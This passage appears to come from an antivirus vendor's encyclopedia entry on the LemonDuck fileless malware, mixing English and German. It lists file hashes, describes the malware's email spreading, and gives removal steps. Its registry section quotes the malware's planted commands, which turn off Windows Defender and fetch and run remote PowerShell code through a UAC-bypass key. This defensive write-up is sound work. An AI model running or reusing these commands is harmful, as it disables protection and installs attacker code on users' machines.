- 00AFFD88FA323B00D4560BF9FEF0EC2F
- 066DDFD4EF0E9CD7C256FE77191EF43C
- 06E746E7EAAC1FAF1C3384E8729C17FB
- 0CB6948805F797BF2A82807973B89537
- 0D546438B1F4C396753B4FC8C8565D5B
- 0D757AD173D2FC249CE19364FD64C8EC
- 0E032B9D51A580AC6CDFABAD8BC97A38
- 12318AA9E8464E83D0D99EF189F37AE9
- 13B29964CC2480B4EF454C59562E675C
- 152EFBCFAFEB22EABDA8FC5E68697A41
- 161CFF084477FE596A5DB81874498A24
- 162E829BE112225FEDF856E38E1C65FE
- 1B46DAF193BB579BDB3B8C6F09637ECC
- 1C4ECC8938FB93812779077127E97662
- 1E3CF87851A2A9CC81128B80F47ACF77
- 209C6174DA490CAEB422F3FA5A7AE634
- 20B2A7351C899FD8E230CAAD9DD9B994
- 20DEDCDDC0CF3176DB3BF18FEB979953
- 259745CB123A52AA2E693AAACCA2DB52
- 26B74CC48F843CBBD08625F3935DDA3F
- 286C6790420F8B7D4B62FF65191AB9B1
- 2BF7AD2CB2213512C8BCAAE1AADD0A22
- 2D20D252A479F485CDF5E171D93985BF
- 2D7F1A5A61D3A96FB5159B5EEF17ADC6
- 2F2D544C53B3031F24D63402EA7FB4F9
- 30FCAA8AD9A496B3E17F7FBFACC72993
- 31C72C210ECC03D1EAE94FA496069448
- 31E8740831B92FCB6E6A2236E115A2B9
- 31FC0DC8F7DFAD0E8BD7CCC3842F2CE9
- 320A78179516C385E35A93FFA0B1C4AC
- 328727B81CA05805A68EF26ACB252039
- 32ED87BDB5FDC5E9CBA88547376818D4
- 352DFE551D62459B20349B78A21A2F37
- 36AA83BDCAB3C9FDAF321CA42A31C3FC
- 3DBDE697D71690A769204BEB12283678
- 3E24DCEAD23468CE597D6883C576F657
- 3F9F5F112DA330AC4C20BE279C6ADDFA
- 3FA45A060BD2693AE4C05B601D05CA0C
- 4057B60B514C5402DDE3D29A1845C366
- 41630ABB825CA50DA31CE1FAC1E9F54D
- 47BF8039A8506CD67C524A03FF84BA4E
- 4ED91524CB54EAACC17A185646FB7491
- 527C9C819B286EFB8EC4EBB5B5AE71CF
- 5377E40CD4426B4CB1E3A42FB406A6AE
- 570A9A65DB8FBA761C1008A51D4C95AB
- 579110C49145015C47ECD267657D3174
- 579DA618CFBFA85247ACF1F800A280A4
- 57D583AA46D571502AAD4BB7AEA09C70
- 5835048CE94AD0564E29A924A03510EF
- 588FEB889288FB953B5F094D47D1565C
- 58A478135A93AC3BF058A5EA0E8FDB71
- 59CAD11838134536E2817E3AD0180BDB
- 5AE7B89B3AFEA28D448ED31B5C704289
- 5B9934D5EF7C2B2B429344C80C7D1D45
- 6103D9D963C57275DD3533674708E7BE
- 62B26C13B70E7D5A9724710A41E63688
- 648AFF3A042261BAB4978076DE2C6B8C
- 64F12CDDAA88057E06A81B54E73B949B
- 674E48B68C5CD0EFD8F7E5FAA87B3D1E
- 68365827D79C4F5CC9B52B688495FD51
- 6920C58D0DF184D829189C44FAFB7ECE
- 69943C5E63B4D2C104DBBCC15138B72B
- 69CBE3ACBC48A3A289E8CDB000C2B7A8
- 6A422496E178B57AF1E2CE9D64C438D2
- 6AA8BC1D5018300D54E51C9860FA961C
- 6D3986E540A63647454A50E26477EF94
- 6F12C0AB327E099821BD938F39FAAB0D
- 700EC8A682F6E41418007992FC604C77
- 7100A909C7FF05B266AF3C42EC058C33
- 71C5391067DE41FAD6F3063162E5EEFF
- 72F5CFA80F07819CCBCFB72FEB9EB9B7
- 73F5D97549F033374FA6D9F9CE247FFD
- 7A21990FCD3D759941E45C490F143D5F
- 7B592E4F8178B4C75788531B2E747687
- 7CE21F17C0AEE7FB9CEBA532D0546AD6
- 81E5F1ADC94DD08B1A072F9C1AE3DD3F
- 85DEEEC2D12F917783B689AE94990716
- 87E694F8DF877A2EE6A3E1AFBC72217A
- 8846F7EAEE8FB117AD06BDD830B7586C
- 89551ACFF8895768E489BB3054AF94FD
- 8AF326AA4850225B75C592D4CE19CCF5
- 8D44C8FF3A4D1979B24BFE29257173AD
- 8FC3EDF738B7A710A912161B471D52FA
- 96880159E785DE5314803B1169768900
- 9796EF5829E5303E785DD4665FC5D99E
- 9CB285C0622B8E5E8181A2B3D1654C17
- A4141712F19E9DD5ADF16919BB38A95C
- A80C9CC3F8439ADA25AF064A874EFE2D
- A836EF24F0A529688BE2AF1479A95411
- A87F3A337D73085C45F9416BE5787D86
- A9B565893C02CCCD70AFC24F7D68FBA4
- AA647B916A1FAD374DF9C30711D58A7A
- AACD12D27C87CAC8FC0B8538AED6F058
- AC1851D2C61045CE0A3E21E43E732D94
- ACB98FD0478427CD18949050C5E87B47
- AD70819C5BC807280974D80F45982011
- AF27EFB60C7B238910EFE2A7E0676A39
- AFFFEBA176210FAD4628F0524BFE1942
- B30E265871924FDF523380F6AF2EA6F7
- B35A9FEA21EFF79A1F14873D21D55DD1
- B3EC3E03E2A202CBD54FD104B8504FEF
- B963C57010F218EDC2CC3C229B5E4D0F
- B9ACFD3C52ED0D6988BED8EB9AC636D6
- B9F917853E3DBF6E6831ECCE60725930
- BA07BA35933E5BF42DEA4AF8ADD09D1E
- BA48D0D7833D929BA60030AE19A63875
- BC007082D32777855E253FD4DEFE70EE
- BCDF115FD9BA99336C31E176EE34B304
- C1790553DBB8362FA7F16D564585B4D1
- C22B315C040AE6E0EFEE3518D830362B
- C5A237B7E9D8E708D8436B6148A25FA1
- C6124A00FEEE3702F78FAA28D03B30EC
- CCB9E05DE0B37A99A7876FE59BD4813F
- D144986C6122B1B1654BA39932465528
- D30C2EF8389AC9E8516BAACB29463B7B
- DE26CCE0356891A4A020E7C4957AFC72
- DF54DE3F3438343202C1DD523D0265BE
- E01A82730005ECA51033F231F14EE106
- E0FBA38268D0EC66EF1CB452D5885E53
- E19CCF75EE54E06B06A5907AF13CEF42
- E1A692BD23BDE99B327756E59308B4F8
- E45A314C664D40A227F9540121D1A29D
- E5810F3C99AE2ABB2232ED8458A61309
- E5AE562DDFAA6B446C32764AB1EBF3ED
- E6BD4CDB1E447131B60418F31D0B81D6
- E7380AE8EF85AE55BDCEAA59E418BD06
- E84D037613721532E6B6D84D215854B6
- E8CD0E4A9E89EAB931DC5338FCBEC54A
- F1351AC828428D74F6DA2968089FC91F
- F2477A144DFF4F216AB81F2AC3E3207D
- F40460FE1CEEC6F6785997F3319553BB
- F4BB18C1165A89248F9E853B269A8995
- F647EC7D17B9630BBF0AD87BEA38ECFC
- F67F5E3F66EFD7298BE6ACD32EEEB27C
- F7EB9C06FAFAA23C4BCF22BA6781C1E2
- F9E37E83B83C47A93C2F09F66408631B
- FB4BF3DDF37CF6494A9905541290CF51
- FE59C71A6DB2AF3B108D27BEE8B0AA50
- It sends copies of itself as zip attachment to email addresses gathered from the victim machine's Outlook contacts, inbox and sent items. It would delete the emails it sent from the sent items folder.
- It tries to connect to the named pipe \.\pipe\HHyeuqi7\ and execute its email propagation module.
- It terminates processes connecting to the following domains:
- pg.{BLOCKED}q.com
- p.{BLOCKED}q.com
- pg.{BLOCKED}4.com
- p.{BLOCKED}4.com
- lplp.{BLOCKED}g.com
- It terminates processes that established a TCP connection to the following ports:
- 1111
- 2222
- 3333
- 4444
- 5555
- 6666
- 7777
- 8888
- 9999
- 14433
- 14444
- 43669
- 43668
- 45560
- 65333
Solutions
Step 1
Für Windows ME und XP Benutzer: Stellen Sie vor einer Suche sicher, dass die Systemwiederherstellung deaktiviert ist, damit der gesamte Computer durchsucht werden kann.
Step 2
<p> Beachten Sie, dass nicht alle Dateien, Ordner, Registrierungsschlüssel und Einträge auf Ihrem Computer installiert sind, während diese Malware / Spyware / Grayware ausgeführt wird. Dies kann auf eine unvollständige Installation oder andere Betriebssystembedingungen zurückzuführen sein. Fahren Sie mit dem nächsten Schritt fort. </ p><p> Beachten Sie, dass nicht alle Dateien, Ordner, Registrierungsschlüssel und Einträge auf Ihrem Computer installiert sind, während diese Malware / Spyware / Grayware ausgeführt wird. Dies kann auf eine unvollständige Installation oder andere Betriebssystembedingungen zurückzuführen sein. Fahren Sie mit dem nächsten Schritt fort. </ p>
Step 3
Im abgesicherten Modus neu starten
Step 4
Restore this modified registry value
Important: Editing the Windows Registry incorrectly can lead to irreversible system malfunction. Please do this only if you know how to or you can seek your system administrator’s help. You may also check out this Microsoft article first before modifying your computer's registry.
- In HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters
- DisableCompression = 1
- DisableCompression = {Default}
- DisableCompression = 1
- In HKEY_CURRENT_USER\Software\Classes\ms-settings\shell\open\command
- DelegateExecute = {Null}
- DelegateExecute = {Default}
- DelegateExecute = {Null}
- In HKEY_CURRENT_USER\Software\Classes\ms-settings\shell\open\command
- (default) = cmd /c echo Set-MpPreference -DisableRealtimeMonitoring 1;Add-MpPreference -ExclusionPath c:\;Add-MpPreference -ExclusionProcess %System%\WindowsPowerShell\v1.0\powershell.exe|powershell -w hidden & Iex(new-object net.webclient).downloadstring('"+{Download URL}+"?$env:username*$env:computername*$ver')
- (default) = {Default}
- (default) = cmd /c echo Set-MpPreference -DisableRealtimeMonitoring 1;Add-MpPreference -ExclusionPath c:\;Add-MpPreference -ExclusionProcess %System%\WindowsPowerShell\v1.0\powershell.exe|powershell -w hidden & Iex(new-object net.webclient).downloadstring('"+{Download URL}+"?$env:username*$env:computername*$ver')
- In HKEY_CURRENT_USER\Software\Classes\mscfile\shell\open\command
- DelegateExecute = {Null}
- DelegateExecute = {Default}
- DelegateExecute = {Null}
- In HKEY_CURRENT_USER\Software\Classes\mscfile\shell\open\command
- (default) = cmd /c powershell -w hidden Iex(new-object net.webclient).downloadstring('"+{Download URL}+"?$env:username*$env:computername*$ver')
- (default) = {Default}
- {Registry Key in Outlook\Security in the list mentioned}
- ObjectModelGuard = 2
- ObjectModelGuard = {Default}
- (default) = cmd /c powershell -w hidden Iex(new-object net.webclient).downloadstring('"+{Download URL}+"?$env:username*$env:computername*$ver')
Step 5
Deleting Scheduled Tasks
The following {Task Name} - {Task to be run} listed should be used in the steps identified below:
For Windows 2000, Windows XP, and Windows Server 2003:
- Open the Windows Scheduled Tasks. Click Start>Programs>Accessories>
System Tools>Scheduled Tasks. - Locate each {Task Name} values listed above in the Name column.
- Right-click on the said file(s) with the aforementioned value.
- Click on Properties. In the Run field, check for the listed {Task to be run}.
- If the strings match the list above, delete the task.
For Windows Vista, Windows 7, Windows Server 2008, Windows 8, Windows 8.1, and Windows Server 2012:
- Open the Windows Task Scheduler. To do this:
• On Windows Vista, Windows 7, and Windows Server 2008, click Start, type taskschd.msc in the Search input field, then press Enter.
• On Windows 8, Windows 8.1, and Windows Server 2012, right-click on the lower left corner of the screen, click Run, type taskschd.msc, then press Enter. - In the left panel, click Task Scheduler Library.
- In the upper-middle panel, locate each {Task Name} values listed above in the Name column.
- In the lower-middle panel, click the Actions tab. In the Details column, check for the {Task to be run} string.
- If the said string is found, delete the task.
Step 6
Diese Dateien suchen und löschen
- {Removable/Network Drive name}\Dblue3.lnk
- {Removable/Network Drive name}\Eblue3.lnk
- {Removable/Network Drive name}\Fblue3.lnk
- {Removable/Network Drive name}\Gblue3.lnk
- {Removable/Network Drive name}\Hblue3.lnk
- {Removable/Network Drive name}\Iblue3.lnk
- {Removable/Network Drive name}\Jblue3.lnk
- {Removable/Network Drive name}\Kblue3.lnk
- {Removable/Network Drive name}\Dblue6.lnk
- {Removable/Network Drive name}\Eblue6.lnk
- {Removable/Network Drive name}\Fblue6.lnk
- {Removable/Network Drive name}\Gblue6.lnk
- {Removable/Network Drive name}\Hblue6.lnk
- {Removable/Network Drive name}\Iblue6.lnk
- {Removable/Network Drive name}\Jblue6.lnk
- {Removable/Network Drive name}\Kblue6.lnk
- {Removable/Network Drive name}\readme.js
- {Removable/Network Drive name}\UTFsync\inf_data
- %System%\inetpub\wwwroot\aspnet_client\js\demo\wanlin.txt
- %System%\inetpub\wwwroot\aspnet_client\js\demo\wanlins.aspx
- %User Temp%\tt.vbs
- %User Temp%\m6.bin
- %User Temp%\m6g.bin
- %User Temp%\kr.bin
- %User Temp%\if.bin
- %User Temp%\if_mail.bin
- %User Temp%\ode.bin
- %User Temp%\nvd.zip
- %User Temp%\mimi.dat
- %User Temp%\mso.jsp
- %User Temp%\ms.jsp
- %User Temp%\rdp.jsp
- %User Temp%\rdpo.jsp
- %User Temp%\smgh.jsp
- %User Temp%\smgho.jsp
- %User Temp%\logic.jsp
- %User Temp%\logico.jsp
- {Malware Path}\dn.ps1
- {Malware Path}\m6.exe
- {Malware Path}\svchost.dat
- {Removable/Network Drive name}\Dblue3.lnk
- {Removable/Network Drive name}\Eblue3.lnk
- {Removable/Network Drive name}\Fblue3.lnk
- {Removable/Network Drive name}\Gblue3.lnk
- {Removable/Network Drive name}\Hblue3.lnk
- {Removable/Network Drive name}\Iblue3.lnk
- {Removable/Network Drive name}\Jblue3.lnk
- {Removable/Network Drive name}\Kblue3.lnk
- {Removable/Network Drive name}\Dblue6.lnk
- {Removable/Network Drive name}\Eblue6.lnk
- {Removable/Network Drive name}\Fblue6.lnk
- {Removable/Network Drive name}\Gblue6.lnk
- {Removable/Network Drive name}\Hblue6.lnk
- {Removable/Network Drive name}\Iblue6.lnk
- {Removable/Network Drive name}\Jblue6.lnk
- {Removable/Network Drive name}\Kblue6.lnk
- {Removable/Network Drive name}\readme.js
- {Removable/Network Drive name}\UTFsync\inf_data
- %System%\inetpub\wwwroot\aspnet_client\js\demo\wanlin.txt
- %System%\inetpub\wwwroot\aspnet_client\js\demo\wanlins.aspx
- %User Temp%\tt.vbs
- %User Temp%\m6.bin
- %User Temp%\m6g.bin
- %User Temp%\kr.bin
- %User Temp%\if.bin
- %User Temp%\if_mail.bin
- %User Temp%\ode.bin
- %User Temp%\nvd.zip
- %User Temp%\mimi.dat
- %User Temp%\mso.jsp
- %User Temp%\ms.jsp
- %User Temp%\rdp.jsp
- %User Temp%\rdpo.jsp
- %User Temp%\smgh.jsp
- %User Temp%\smgho.jsp
- %User Temp%\logic.jsp
- %User Temp%\logico.jsp
- {Malware Path}\dn.ps1
- {Malware Path}\m6.exe
- {Malware Path}\svchost.dat
Step 7
Führen Sie den Neustart im normalen Modus durch, und durchsuchen Sie Ihren Computer mit Ihrem Trend Micro Produkt nach Dateien, die als Fileless.LEMONDUCK entdeckt werden. Falls die entdeckten Dateien bereits von Ihrem Trend Micro Produkt gesäubert, gelöscht oder in Quarantäne verschoben wurden, sind keine weiteren Schritte erforderlich. Dateien in Quarantäne können einfach gelöscht werden. Auf dieser Knowledge-Base-Seite finden Sie weitere Informationen.
Participez à notre enquête!